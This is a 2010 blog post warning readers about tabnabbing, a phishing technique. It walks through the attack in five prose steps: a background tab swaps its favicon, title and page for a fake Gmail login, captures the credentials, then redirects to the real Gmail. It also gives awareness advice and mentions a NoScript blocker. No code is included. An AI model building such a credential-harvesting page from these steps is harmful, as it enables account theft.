Thursday, May 27, 2010

Tabnabbing - new phishing technique

Ever walk away from your computer, or change focus to a different application for a while and forget where you were surfing?

Might want to be careful. A new phishing proof of concept that affects Firefox, Chrome, IE 8 and most other browsers that support simple scripting and tabs might fool you into thinking you were about to log onto your email account -- or your bank!

It's called Tabnabbing, and a malicious site might use it to change the information on a web page to something that looks like your bank, Gmail account, or even a gaming account log in page. (Hit that link above to see more info as well as a harmless working demo of the technique.)


How The Attack Works

1. A user navigates to your normal looking site.

2. You detect when the page has lost its focus and hasn’t been interacted with for a while.

3. Replace the favicon with the Gmail favicon, the title with “Gmail: Email from Google”, and the page with a Gmail login look-a-like. This can all be done with just a little bit of Javascript that takes place instantly.

4. As the user scans their many open tabs, the favicon and title act as a strong visual cue—memory is malleable and moldable and the user will most likely simply think they left a Gmail tab open. When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in. The attack preys on the perceived immutability of tabs.

5. After the user has entered their login information and you’ve sent it back to your server, you redirect them to Gmail. Because they were never logged out in the first place, it will appear as if the login was successful.


You know the drill by now: inform your friends, parents, siblings, co-workers and make sure that official looking log in page to which you're about to respond is one YOU pulled up - not one that just happened to be there when you got back from that bio-break.

UPDATE: If you use Firefox with NoScript, version of said NoScript includes an experimental tabnabbing blocker.

No comments:

Post a Comment

Comments are welcome but moderated to prevent spam links. I usually check them at least once a day in the evenings - so please be patient with me if your comment does not appear quickly.

Thank you.